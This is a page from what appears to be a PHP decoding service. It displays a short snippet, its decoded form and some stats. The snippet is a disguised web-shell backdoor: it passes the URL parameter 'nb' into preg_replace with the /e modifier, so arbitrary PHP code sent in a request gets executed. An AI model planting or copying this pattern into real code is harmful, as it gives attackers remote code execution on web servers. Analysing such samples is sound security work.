Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php class SBdog{ public $x; function dog(){ $this->x=$_GET['nb']; } } ..
Decoded Output download
<?php
class SBdog{
public $x;
function dog(){
$this->x=$_GET['nb'];
}
}
$class=new SBdog();
$class->dog();
$a=$class->x;
preg_replace("/dog/e", $a, "I am a sb dog");
?>
Did this file decode correctly?
Original Code
<?php
class SBdog{
public $x;
function dog(){
$this->x=$_GET['nb'];
}
}
$class=new SBdog();
$class->dog();
$a=$class->x;
preg_replace("/dog/e", $a, "I am a sb dog");
?>
Function Calls
| None |
Stats
| MD5 | 2c437a76940ee7e2d23a245e71fbd7d6 |
| Eval Count | 0 |
| Decode Time | 116 ms |